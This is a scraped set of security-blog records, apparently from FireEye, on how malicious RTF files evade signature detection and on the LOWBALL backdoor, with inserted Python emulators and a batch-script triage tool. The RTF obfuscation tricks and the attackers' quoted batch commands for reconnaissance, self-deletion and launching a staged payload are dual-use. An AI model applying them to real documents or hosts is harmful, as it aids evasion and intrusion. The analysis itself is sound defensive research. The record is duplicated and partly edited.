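        starred = rtf[i:i + 2] == b"*\\"      # the \* ignorable-destination prefix
        i += 2 if starred else 0
        m = re.match(rb"([A-Za-z]+)(-?[0-9]*)", rtf[i:])
        if m is None:                         # a control symbol, not a control word
            if rtf[i:i + 1] == b"'":
                yield ("hexesc",); i += 3     # \'hh: the encoded byte is discarded (d)
            else:
                yield ("esc",); i += 1        # \{ \} \\ \% \+ \- are ignored (d)
            continue
        name = m.group(1)[:CTRL_BUF - 1]      # cut off at the 0xFF buffer (e)
        param = m.group(2)[:max(0, CTRL_BUF - 2 - len(name))]
        i += len(name) + len(param)           # anything cut off is read again as data
        if rtf[i:i + 1] == b" ": i += 1       # a single space delimits the control word
        if name == b"bin":                    # \binN: the next N bytes are raw data (a)
            cnt = word_param(param.decode())
            yield ("bin", rtf[i:i + cnt]); i += cnt
        else:
            yield ("word", name.decode(), param.decode(), starred)

def objdata_hex(rtf: bytes) -> str:
    """Effective \\objdata content, as a hex string, after rules a-f are applied."""
    stack, dest, skip = [], None, False
    out, pending = [], None                   # pending = unpaired high nibble
    for tok in tokens(rtf):
        kind = tok[0]
        if kind == "open":
            stack.append((dest, skip))
        elif kind == "close" and stack:
            dest, skip = stack.pop()
        elif kind == "word":
            name, starred = tok[1], tok[3]
            if name == "objdata":             # (f) the last \objdata wins: buffer reset
                dest, skip, out, pending = "objdata", False, [], None
            elif starred and name not in KNOWN_NO_DATA:
                skip = True                   # \*\datastore, \*\unknown eat their group
            # every other control word (\par, \datastore, \uN, \unknown ...) is ignored
        elif dest != "objdata" or skip:
            continue
        elif kind == "bin":
            out.append(tok[1].hex()); pending = None
        elif kind == "hexesc":
            pending = None                    # (d) the hex-decoding state is reset
        elif kind == "char" and tok[1] not in WS and tok[1] in HEX:
            nib = tok[1].decode("ascii")
            if pending is None:
                pending = nib
            else:
                out.append(pending + nib); pending = None
    return "".join(out) + (pending or "")

def shape_props(rtf: bytes) -> dict:
    """Reassemble the split \\sn/\\sv pieces of each {\\sp ...} group (section 1);
    the \\snN/\\svN parameters and the \\r\\n between pieces are ignored."""
    props, dest, sn, sv = {}, None, [], []
    for tok in tokens(rtf):
        if tok[0] == "word":
            if tok[1] == "sp" and sn:         # a new shape property starts
                props["".join(sn)] = "".join(sv); sn, sv = [], []
            if tok[1] in ("sn", "sv"):
                dest = tok[1]
        elif tok[0] == "close":
            dest = None                       # each piece sits in its own group
        elif tok[0] == "char" and dest and tok[1] not in WS:
            (sn if dest == "sn" else sv).append(tok[1].decode("latin-1"))
    if sn:
        props["".join(sn)] = "".join(sv)
    return props
```

Feeding it the samples from the tables above returns the Clear column in each case; `objdata_hex(SAMPLE)` returns `3423450145`, and a control word of 0xFE letters placed in front of the data is swallowed exactly as section 2e describes. It is a model of the behaviour this post reports, not a conforming RTF reader, so a disagreement between it and Word on a real sample is something to settle under the OleConvertOLESTREAMToIStorage breakpoint rather than by trusting either side.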
To extract an obfuscated picture, locate the RTF parsing code quickly using data breakpoint and that will reveal the best point to dump the whole data.\n\n#### **Conclusion**\n\nOur adversaries are sophisticated and familiar with the RTF format and the inner workings of Microsoft Word. They have managed to devise these obfuscation tricks to evade traditional signature-based detection. Understanding how our adversary is performing obfuscation can in turn help us improve our detection of such malware.\n\n#### **Acknowledgements**\n\nThanks to Yinhong Chang, Jonell Baltazar and Daniel Regalado for their contributions to this blog.\n", "cvss3": {}, "published": "2016-05-20T14:59:00", "type": "fireeye", "title": "How RTF malware evades static signature-based detection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2010-3333", "CVE-2014-1761", "CVE-2015-1641"], "modified": "2016-05-20T14:59:00", "id": "FIREEYE:E267B700204EA085E6CF4FEBA0C989D3", "href": "https://www.fireeye.com/blog/threat-research/2016/05/how_rtf_malware_evad.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-03-07T16:24:18", "description": "#### **History**\n\nRich Text Format (RTF) is a document format developed by Microsoft that has been widely used on various platforms for more than 29 years. The RTF format is very flexible and therefore complicated. This makes the development of a safe RTF parsers challenging. 
Some notorious vulnerabilities such as [CVE-2010-3333](<http://www.microsoft.com/technet/security/Bulletin/MS10-087.mspx>) and [CVE-2014-1761](<https://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers/>) were caused by errors in implementing RTF parsing logic.\n\nIn fact, RTF malware is not limited to exploiting RTF parsing vulnerabilities. Malicious RTF files can include other vulnerabilities unrelated to the RTF parser because RTF supports the embedding of objects, such as OLE objects and images. [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) and [CVE-2015-1641](<https://blog.fortinet.com/post/the-curious-case-of-the-document-exploiting-an-unknown-vulnerability-part-1>) are two typical examples of such vulnerabilities \u2013 their root cause does not reside in the RTF parser and attackers can exploit these vulnerabilities through other file formats such as DOC and DOCX.\n\nAnother type of RTF malware does not use any vulnerabilities. It simply contains embedded malicious executable files and tricks the user into launching those malicious files. This allows attackers to distribute malware via email, which is generally not a vector for sending executable files directly.\n\nPlenty of malware authors prefer to use RTF as an attack vector because RTF is an obfuscation-friendly format. As such, their malware can easily evade static signature based detection such as YARA or Snort. This is a big reason why, in this scriptable exploit era, we still see such large volumes of RTF-based attacks.\n\nIn this blog, we present some common evasive tricks used by malicious RTFs. \n\n#### **Common obfuscations**\n\nLet\u2019s discuss a couple different RTF obfuscation strategies.\n\n**1\\. CVE-2010-3333**\n\nThis vulnerability, reported by Team509 in 2009, is a typical stack overflow bug. 
Exploitation of this vulnerability is so easy and reliable that it is still used in the wild, seven years after its discovery! Recently, attackers exploiting this vulnerability [targeted an Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>).\n\nThe root cause of this vulnerability was that the Microsoft RTF parser has a stack-based buffer overflow in the procedure parsing the pFragments shape property. Crafting a malicious RTF to exploit this vulnerability allows attackers to execute arbitrary code. Microsoft has since addressed the vulnerability, but many old versions of Microsoft Office were affected, so its threat rate was very high.\n\n\n\n\n\nThe Microsoft Office RTF parser lacks proper bounds checking when copying source data to a limited stack-based buffer. The pattern of this exploit can be simplified as follows:\n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv A;B;[word1][word2][word3][hex value array]}}}} \n \n--- \n \nBecause pFragments is rarely seen in normal RTF files, many firms would simply detect this keyword and the oversized number right after \\sv in order to catch the exploit using YARA or Snort rules. This method works for samples that are not obfuscated, including samples generated by Metasploit. However, against in-the-wild samples, such signature-based detection is insufficient. For instance, [the malicious RTF targeting the Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>) is a good sample to illustrate the downside of the signature based detection. Figure 1 shows this RTF document in a hex editor. We simplified Figure 1 because of the space limitations \u2013 there were plenty of dummy symbols such as { } in the initial sample.\n\n\n\nFigure 1. 
Obfuscated sample of CVE-2010-3333\n\nAs we can see, the pFragments keyword has been split into many pieces that would bypass most signature based detection. For instance, most anti-virus products failed to detect this sample on first submission to VirusTotal. In fact, not only will the split pieces of \\sn be combined together, pieces of \\sv will be combined as well. The following example demonstrates this obfuscation:\n\nObfuscated\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn2 pF}{\\sn44 ragments}{\\sv 1;28}{\\sv ;fffffffffffff\u2026.}}}} \n \n---|--- \n \nClear\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv 1;28 ;fffffffffffff\u2026.}}}} \n \nWe can come up with a variety of ideas different from the aforementioned sample to defeat static signature based detection.\n\nNotice the mixed \u2018\\x0D\u2019 and \u2018\\x0A\u2019 \u2013 they are \u2018\\r\u2019 and \u2018\\n\u2019 and the RTF parser would simply ignore them.\n\n**2\\. Embedded objects**\n\nUsers can embed variety of objects into RTF, such as OLE (Object Linking and Embedding) control objects. This makes it possible for OLE related vulnerabilities such as CVE-2012-0158 and CVE-2015-1641 to be accommodated in RTF files. In addition to exploits, it is not uncommon to see executable files such as PE, CPL, VBS and JS embedded in RTF files. These files require some form of social engineering to trick users into launching the embedded objects. We have even seen some Data Loss Prevention (DLP) solutions embedding PE files inside RTF documents. It\u2019s a bad practice because it cultivates poor habits in users.\n\nLet\u2019s take a glance at [the embedded object syntax first](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n\n\n<objtype> specifies the type of object. \\objocx is the most common type used in malicious RTFs for embedding OLE control objects; as such, let\u2019s take it as an example. 
The data right after \\objdata is OLE1 native data, [defined as](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n<data>\n\n| \n\n(\\binN #BDATA) | #SDATA \n \n---|--- \n \n#BDATA\n\n| \n\nBinary data \n \n#SDATA\n\n| \n\nHexadecimal data \n \nAttackers would try to insert various elements into the <data> to evade static signature detection. Let\u2019s take a look at some examples to understand these tricks:\n\na. For example, \\binN can be swapped with #SDATA. The data right after \\binN is raw binary data. In the following example, the numbers 123 will be treated as binary data and hence translated into hex values 313233 in memory.\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin3 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nLet\u2019s look at another example:\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin41541544011100001100000000000000000000000000000000000000000003 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nIf we try to call atoi or atol with the numeric parameter string marked in red in the table above, we will get 0x7fffffff while its true value should be 3.\n\nThis happens because [\\bin takes a 32-bit signed integer numeric parameter](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>). You would think that the RTF parser calls atoi or atol to convert the numeric string to an integer; however, that\u2019s is not the case. Microsoft Word\u2019s RTF parser does not use these standard C runtime functions. Instead, the atoi function in Microsoft Word\u2019s RTF parser is implemented as follows:\n\n\n\nb. \\ucN and \\uN \nBoth of them are ignored, and the characters right after \\uN would not be skipped.\n\nc. The space characters: 0x0D (\\n), 0x0A (\\r), 0x09 (\\t) are ignored.\n\nd. Escaped characters \nRTF has some special symbols that are reserved. 
For normal use, users will need to escape these symbols. Here's an incomplete list:\n\n\\\\} \n\\\\{ \n\\% \n\\\\+ \n\\\\- \n\\\\\\ \n\\'hh\n\nAll of those escaped characters are ignored, but there\u2019s an interesting situation with \\\u2019hh. Let\u2019s look into an example first:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 341\\\u2019112345 } \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 342345} \n \nWhen parsing \\\u201911, the parser will treat the 11 as an encoded hex byte. This hex byte is then discarded before it continues parsing the rest of objdata. The 1 preceding \\\u201911 has also been discarded. Once the RTF parser parses the 1 right before \\\u201911, which is the higher 4-bit of an octet, and then immediately encounters \\\u201911, the higher 4-bit would be discarded. That\u2019s because the internal state for decoding the hex string to binary bytes has been reset.\n\nThe table below shows the processing procedure, the two 1s in the yellow rows are from \\\u201911. It\u2019s clear that the mixed \\\u201911 disorders the state variable, which causes the higher 4-bit of the second byte to be discarded:\n\n\n\ne. Oversized control word and numeric parameter \nThe [RTF specification](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>) says that a control word\u2019s name cannot be longer than 32 letters and the numeric parameter associated with the control word must be a signed 16-bit integer or signed 32-bit integer, but the RTF parser of Microsoft Office doesn\u2019t strictly obey the specification. Its implementation only reserves a buffer of size 0xFF for storing the control word string and the numeric parameter string, both of which are null-terminated. All characters after the maximum buffer length (0xFF) will not remain as part of the control word or parameter string. 
Instead, the control word or parameter will be terminated.\n\n\n\nIn the first obfuscated example, the length of the over-sized control word is 0xFE. By adding a null-terminator, the control word string will reach the maximum length of 0xFF, then the remaining data belongs to objdata.\n\nFor the second obfuscated example, the total length of the \u201cbin\u201d control word and its parameter is 0xFD. By adding their null-terminator, the length equals 0xFF.\n\nf. Additional techniques\n\nThe program uses the last \\objdata control word in a list, as shown here:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 554564{\\\\*\\objdata 4444}54545} OR\n\n{\\object\\objocx\\objdata 554445\\objdata 444454545}\n\n{\\object\\objocx{{\\objdata 554445}{\\objdata 444454545}}} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444454545} \n \nAs we can see here, except for \\binN, other control words are ignored:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\par2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444{\\datastore2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\datastore2211 55556666} OR\n\n{\\object\\objocx\\objdata 44444444{\\unknown2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\unknown2211 55556666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \nThere is another special case that makes the situation a bit more complicated. That is control symbol \\\\*. From RTF specification, we can get the description for [this control symbol:](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>)\n\n_Destinations added after the 1987 RTF Specification may be preceded by the control symbol **\\\\*** (backslash asterisk). This control symbol identifies destinations whose related text should be ignored if the RTF reader does not recognize the destination control word._\n\nLet\u2019s take a look at how it can be used in obfuscations:\n\n1\\. 
\n\n| Obfuscated | Clear |\n|---|---|\n| `{\\object\\objocx\\objdata 44444444{\\*\\par314 5555}6666}` | `{\\object\\objocx\\objdata 4444444455556666}` |\n\n`\\par` is a known control word that does not accept any data. The RTF parser skips the control word, and only the data that follows remains.\n\n2\\.\n\n| Obfuscated | Clear |\n|---|---|\n| `{\\object\\objocx\\objdata 44444444{\\*\\datastore314 5555}6666}` | `{\\object\\objocx\\objdata 444444446666}` |\n\nThe RTF parser also recognizes `\\datastore` and knows that it accepts data, so the data that follows is consumed by `\\datastore` and never reaches `\\objdata`.\n\n3\\.\n\n| Obfuscated | Clear |\n|---|---|\n| `{\\object\\objocx\\objdata 44444444{\\*\\unknown314 5555}6666}` | `{\\object\\objocx\\objdata 444444446666}` |\n\nThe parser does not recognize `\\unknown`, and because the destination is preceded by `\\*`, the whole group is ignored, data included, exactly as the specification quoted above says it should be.\n\nFor an analyst it is difficult to extract embedded objects from an obfuscated RTF by hand, and at the time of writing no public tool could handle obfuscated RTF. However, winword.exe uses the OleConvertOLESTREAMToIStorage function to convert OLE1 native data into an OLE2 structured storage object. Here is the prototype of OleConvertOLESTREAMToIStorage:\n\n\n\nThe object pointed to by lpolestream contains a pointer to the OLE1 native binary data, so a breakpoint on OleConvertOLESTREAMToIStorage lets us dump the object data after the RTF parser has already de-obfuscated it for us:\n\n\n\nThe last command, .writemem, writes a section of memory to d:\\evil_objdata.bin (any other path works); 0e170020 is the start address of the memory range and 831b6 is its size, which WinDbg takes as the length part of the range (L831b6).\n\nMost of the `\\objdata` obfuscation techniques also apply to embedded images, but for images there is no equally convenient choke point such as OleConvertOLESTREAMToIStorage. 
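The tricks above are all deterministic parser behaviour, so the `\objdata` stream can also be recovered statically once that behaviour is emulated. What follows is an added example written for this edit, not FireEye's tooling and not Word's code: a Python emulation of the reader quirks described above (the `\'hh` state reset, ignored escapes and control words, the 0xFF control-word buffer, last-`\objdata`-wins, `\binN`, and the `\*` rules). The set of control words it treats as "known" is an assumption limited to the ones shown here, and what the real reader does with a pending nibble when `\bin` data arrives is not described, so the code assumes it is discarded.

```python
r"""Emulation of how Word's RTF reader rebuilds the \objdata hex stream.

Added example, not code from the FireEye post: the parser quirks described
above, as a state machine, so the samples decode without a debugger.
  * hex digits pair into bytes; anything that is not hex is dropped;
  * \'hh is decoded and discarded, along with a pending high nibble (state reset);
  * \{ \} \\ \% \+ \- and other control symbols are ignored; control words
    other than \binN are ignored, and \binN copies N raw bytes;
  * a name is cut off after 0xFE characters, name plus parameter after 0xFD;
  * every \objdata restarts the stream, so the last one wins;
  * after \*, a known no-data word (\par) changes nothing; a known data-taking
    destination (\datastore) or an unknown word drops the rest of the group.
Which words are "known" is an assumption limited to those shown in the post;
a pending nibble when \bin data arrives is assumed to be discarded.
"""

HEX, DIGITS = b"0123456789abcdefABCDEF", b"0123456789"
ALPHA = b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
CW_BUFFER = 0xFF           # control word and parameter share one NUL-terminated buffer
KNOWN_PLAIN = {"par"}      # known control words that take no data (assumption)


class HexStream:           # hex-to-binary decoder with the nibble state the post describes
    def __init__(self):
        self.out, self.high, self.active = bytearray(), None, False

    def restart(self):     # a new \objdata discards everything decoded so far
        self.out, self.high, self.active = bytearray(), None, True

    def feed(self, ch):    # one hex digit; two digits make a byte
        if not self.active:
            return
        value = int(chr(ch), 16)
        if self.high is None:
            self.high = value
        else:
            self.out.append((self.high << 4) | value)
            self.high = None

    def raw(self, data):   # \binN payload, copied byte for byte
        if self.active:
            self.high, self.out = None, self.out + data

    def as_hex(self):      # as the post prints it; a trailing unpaired nibble is kept
        return self.out.hex() + (f"{self.high:x}" if self.high is not None else "")


def _decode(rtf: bytes) -> HexStream:
    st, depth, skip_depth, star, i, n = HexStream(), 0, None, False, 0, len(rtf)
    while i < n:
        c, was_star, star = rtf[i], star, False
        if c == ord("{"):
            depth += 1
        elif c == ord("}"):
            if skip_depth == depth:            # end of a dropped \* destination
                skip_depth = None
            depth -= 1
        elif c != ord("\\"):
            if c in HEX and skip_depth is None:
                st.feed(c)
        else:
            i += 1
            c = rtf[i] if i < n else 0
            if c == ord("'"):                  # \'hh: the byte and a pending nibble go
                st.high = None
                i += 2
            elif c == ord("*"):
                star = True
            elif c in ALPHA:                   # control word, maybe with a parameter
                name_start = i
                while i < n and rtf[i] in ALPHA and i - name_start < CW_BUFFER - 1:
                    i += 1
                name, param = rtf[name_start:i].decode(), b""
                if i - name_start < CW_BUFFER - 1:       # name not truncated: read parameter
                    p_start = i
                    if i < n and rtf[i] == ord("-"):
                        i += 1
                    while i < n and rtf[i] in DIGITS and i - name_start < CW_BUFFER - 2:
                        i += 1
                    param = rtf[p_start:i]
                    if i < n and rtf[i] == ord(" "):     # delimiting space belongs to the word
                        i += 1
                if skip_depth is None:
                    if name == "objdata":
                        st.restart()
                    elif name == "bin" and param.isdigit():
                        st.raw(rtf[i:i + int(param)])
                        i += int(param)
                    elif was_star and name not in KNOWN_PLAIN:
                        skip_depth = depth             # \*\datastore or \*\unknown: drop group
                continue                               # i already points past the word
        i += 1                                         # other control symbols are skipped here
    return st


def extract_objdata(rtf: bytes) -> str:
    """Recovered hex stream, comparable with the 'Clear' column above."""
    return _decode(rtf).as_hex()


def extract_objdata_bytes(rtf: bytes) -> bytes:
    """Recovered OLE1 object data, what OleConvertOLESTREAMToIStorage receives."""
    return bytes(_decode(rtf).out)
```

Fed the `\'hh` sample above, extract_objdata returns 342345; fed the three `\*` samples it returns 4444444455556666, 444444446666 and 444444446666, matching the Clear column, and a control word of 0x100 letters is cut at 0xFE so the remaining two letters become data. extract_objdata_bytes gives the OLE1 stream that would otherwise have to be dumped at the OleConvertOLESTREAMToIStorage breakpoint, ready for an OLE parser or a hash lookup.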
To extract an obfuscated picture, locate the RTF parsing code quickly using data breakpoint and that will reveal the best point to dump the whole data.\n\n#### **Conclusion**\n\nOur adversaries are sophisticated and familiar with the RTF format and the inner workings of Microsoft Word. They have managed to devise these obfuscation tricks to evade traditional signature-based detection. Understanding how our adversary is performing obfuscation can in turn help us improve our detection of such malware.\n\n#### **Acknowledgements**\n\nThanks to Yinhong Chang, Jonell Baltazar and Daniel Regalado for their contributions to this blog.\n", "cvss3": {}, "published": "2016-05-20T14:59:00", "type": "fireeye", "title": "How RTF malware evades static signature-based detection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2010-3333", "CVE-2014-1761", "CVE-2015-1641"], "modified": "2016-05-20T14:59:00", "id": "FIREEYE:38120E3D3979DCD57297419690545DDD", "href": "https://www.fireeye.com/blog/threat-research/2016/05/how_rtf_malware_evad.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T08:35:01", "description": "FireEye Threat Intelligence analysts identified a spear phishing campaign carried out in August 2015 targeting Hong Kong-based media organizations. 
A China-based cyber threat group, which FireEye tracks as an uncategorized advanced persistent threat (APT) group and other researchers refer to as \u201cadmin@338,\u201d may have conducted the activity.[1] The email messages contained malicious documents with a malware payload called LOWBALL. LOWBALL abuses the Dropbox cloud storage service for command and control (CnC). We collaborated with Dropbox to investigate the threat, and our cooperation revealed what may be a second, similar operation. The attack is part of a trend where threat groups hide malicious activity by communicating with legitimate web services such as social networking and cloud storage sites to foil detection efforts.[2][3]\n\n### A Cyber Campaign Likely Intended to Monitor Hong Kong Media During a Period of Crisis\n\nThe threat group has previously used newsworthy events as lures to deliver malware.[4] They have largely targeted organizations involved in financial, economic and trade policy, typically using publicly available RATs such as Poison Ivy, as well some non-public backdoors.[5]\n\nThe group started targeting Hong Kong media companies, probably in response to political and economic challenges in Hong Kong and China. The threat group\u2019s latest activity coincided with the announcement of criminal charges against democracy activists.[6] During the past 12 months, Chinese authorities have faced several challenges, including large-scale protests in Hong Kong in late 2014, the precipitous decline in the stock market in mid-2015, and the massive industrial explosion in Tianjin in August 2015. In Hong Kong, the pro-democracy movement persists, and the government recently denied a professor a post because of his links to a pro-democracy leader.[7]\n\nMultiple China-based cyber threat groups have targeted international media organizations in the past. The targeting has often focused on Hong Kong-based media, particularly those that publish pro-democracy material. 
The media organizations targeted with the threat group\u2019s well-crafted Chinese language lure documents are precisely those whose networks Beijing would seek to monitor. Cyber threat groups\u2019 access to the media organization\u2019s networks could potentially provide the government advance warning on upcoming protests, information on pro-democracy group leaders, and insights needed to disrupt activity on the Internet, such as what occurred in mid-2014 when several websites were brought down in denial of service attacks.[8]\n\n### Threat Actors Use Spear Phishing Written in Traditional Chinese Script in Attempted Intrusions\n\nIn August 2015, the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations, including newspapers, radio, and television. The first email references the creation of a Christian civil society organization to coincide with the anniversary of the 2014 protests in Hong Kong known as the Umbrella Movement. The second email references a Hong Kong University alumni organization that fears votes in a referendum to appoint a Vice-Chancellor will be co-opted by pro-Beijing interests.[9]\n\n\n\nFigure 1: Lure Screenshots\n\nThe group\u2019s previous activities against financial and policy organizations have largely focused on spear phishing emails written in English, destined for Western audiences. 
This campaign, however, is clearly designed for those who read the traditional Chinese script commonly used in Hong Kong.\n\n### LOWBALL Malware Analysis\n\nThe spear phishing emails contained three attachments in total, each of which exploited an older vulnerability in Microsoft Office (CVE-2012-0158):\n\n| MD5 | Filename |\n|---|---|\n| b9208a5b0504cb2283b1144fc455eaaa | \u4f7f\u547d\u516c\u6c11\u904b\u52d5 \u6211\u5011\u7684\u7570\u8c61.doc |\n| ec19ed7cddf92984906325da59f75351 | \u65b0\u805e\u7a3f\u53ca\u516c\u4f48.doc |\n| 6495b384748188188d09e9d5a0c401a4 | (\u4ee3\u767c)[\u91c7\u8a2a\u901a\u77e5]\u6e2f\u5927\u6821\u53cb\u95dc\u6ce8\u7d44\u905e\u4fe1\u884c\u52d5.doc |\n\nIn all three cases, the payload was the same:\n\n| MD5 | Filename |\n|---|---|\n| d76261ba3b624933a6ebb5dd73758db4 | time.exe |\n\nThis backdoor, known as LOWBALL, uses the legitimate Dropbox cloud-storage service as its CnC server. It talks to the Dropbox API with a hardcoded bearer access token and can download, upload, and execute files. All communication is HTTPS over TCP port 443, so it blends in with legitimate Dropbox traffic.\n\nAfter execution, the malware uses the Dropbox API to issue HTTP GET requests for the following files:\n\n| MD5 | Filename |\n|---|---|\n| d76261ba3b624933a6ebb5dd73758db4 | WmiApCom |\n| 79b68cdd0044edd4fbf8067b22878644 | WmiApCom.bat |\n\nThe \u201cWmiApCom.bat\u201d file simply starts \u201cWmiApCom\u201d, which is byte-for-byte the same file as the one dropped by the malicious Word documents. This is most likely a mechanism for updating the compromised host with a new version of LOWBALL.\n\nThe threat group monitors its Dropbox account for responses from compromised computers. 
Once the LOWBALL malware calls back to the Dropbox account, the attackers create a file called \u201c[COMPUTER_NAME]_upload.bat\u201d containing the commands to be executed on the compromised computer. This batch file is then executed on the target, and the results are uploaded to the attackers\u2019 Dropbox account in a file named \u201c[COMPUTER_NAME]_download\u201d.\n\nWe observed the threat group issue the following commands:\n\n```\n@echo off\ndir c:\\ >> %temp%\\download\nipconfig /all >> %temp%\\download\nnet user >> %temp%\\download\nnet user /domain >> %temp%\\download\nver >> %temp%\\download\ndel %0\n```\n\n```\n@echo off\ndir \"c:\\Documents and Settings\" >> %temp%\\download\ndir \"c:\\Program Files\\\" >> %temp%\\download\nnet start >> %temp%\\download\nnet localgroup administrator >> %temp%\\download\nnetstat -ano >> %temp%\\download\n```\n\nThese commands give the threat group information about the compromised computer and the network it belongs to. Using that information, they can decide whether to explore further or instruct the compromised computer to download additional malware.\n\nWe observed the threat group upload a second-stage malware known as BUBBLEWRAP (also known as Backdoor.APT.FakeWinHTTPHelper) to their Dropbox account along with the following command:\n\n```\n@echo off\nren \"%temp%\\upload\" audiodg.exe\nstart %temp%\\audiodg.exe\ndir d:\\ >> %temp%\\download\nsysteminfo >> %temp%\\download\ndel %0\n```\n\nWe have previously observed the admin@338 group use BUBBLEWRAP. 
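The tasking scripts above share a structure that is easy to triage once a `[COMPUTER_NAME]_upload.bat` is in hand, whether it was pulled from the Dropbox account or recovered from a victim's %temp% directory. Below is an added example, not code from this post, that scores such a script for the pattern the group used: a run of discovery commands appending to one scratch file, a self-delete, and the rename-and-start of a staged download. The sample scripts are constructed from the commands listed above, and the thresholds and verdict labels are assumptions.

```python
"""Triage of LOWBALL-style tasking scripts.

Added example, not code from the FireEye post. It scores a batch script for the
pattern shared by the [COMPUTER_NAME]_upload.bat tasks shown above: a run of
reconnaissance commands appending to one scratch file, a self-delete, and the
rename-and-start of a staged download. The sample scripts are constructed from
the commands the post lists; thresholds and verdict labels are assumptions.
"""
import re
from collections import Counter

# Discovery commands the group issued, with what each one reveals.
RECON = {"dir": "directory listing", "ipconfig": "network configuration",
         "net": "accounts, groups and services", "ver": "OS version",
         "systeminfo": "OS and patch inventory", "netstat": "connections and listeners"}
REDIRECT = re.compile(r">>?\s*(\S+)")                      # where output is written
SELF_DELETE = re.compile(r"^del\s+%0\b", re.I)              # batch file removes itself
RENAME = re.compile(r'^ren(?:ame)?\s+"?([^"\s]+)"?\s+(\S+)', re.I)
START = re.compile(r'^start\s+"?([^"\s]+)', re.I)


def _commands(script):
    """Yield non-empty command lines, skipping @echo and comments."""
    for raw in script.splitlines():
        line = raw.strip()
        if line and not line.lower().startswith(("@echo", "rem ", "::")):
            yield line


def analyze_tasking(script):
    """Return findings and a verdict for one batch script."""
    recon, sinks, staged, renamed, self_delete = [], Counter(), [], {}, False
    for line in _commands(script):
        word = line.split()[0].lower()
        m = REDIRECT.search(line)
        sink = m.group(1).lower() if m else None
        if word in RECON:
            recon.append((word, RECON[word], sink))
            if sink:
                sinks[sink] += 1
        elif SELF_DELETE.match(line):
            self_delete = True
        elif m := RENAME.match(line):
            renamed[m.group(2).lower()] = m.group(1).lower()
        elif m := START.match(line):
            path = m.group(1).lower()
            if path.rsplit("\\", 1)[-1] in renamed:        # starts a file it just renamed
                staged.append(path)
    top = sinks.most_common(1)
    sink = top[0][0] if top and top[0][1] >= 2 else None   # one file collects the output
    indicators = []
    if len(recon) >= 3 and sink:
        indicators.append(f"{len(recon)} recon commands append to {sink}")
    if staged:
        indicators.append("renames and starts staged file: " + ", ".join(staged))
    if self_delete:
        indicators.append("script deletes itself (del %0)")
    verdict = "tasking" if staged or (len(recon) >= 3 and sink) else "no tasking indicators"
    return {"recon": recon, "sink": sink, "staged_exec": staged,
            "self_delete": self_delete, "indicators": indicators, "verdict": verdict}


# Constructed from the commands quoted above; not captured files.
TASK_RECON = r"""@echo off
dir c:\ >> %temp%\download
ipconfig /all >> %temp%\download
net user >> %temp%\download
net user /domain >> %temp%\download
ver >> %temp%\download
del %0
"""
TASK_STAGE = r"""@echo off
ren "%temp%\upload" audiodg.exe
start %temp%\audiodg.exe
dir d:\ >> %temp%\download
systeminfo >> %temp%\download
del %0
"""
BENIGN = r"""@echo off
ipconfig /all > \\fileserver\inventory\%COMPUTERNAME%.txt
"""

if __name__ == "__main__":
    for name in ("TASK_RECON", "TASK_STAGE", "BENIGN"):
        result = analyze_tasking(globals()[name])
        print(f"{name}: {result['verdict']}", *result["indicators"], sep="\n  ")
```

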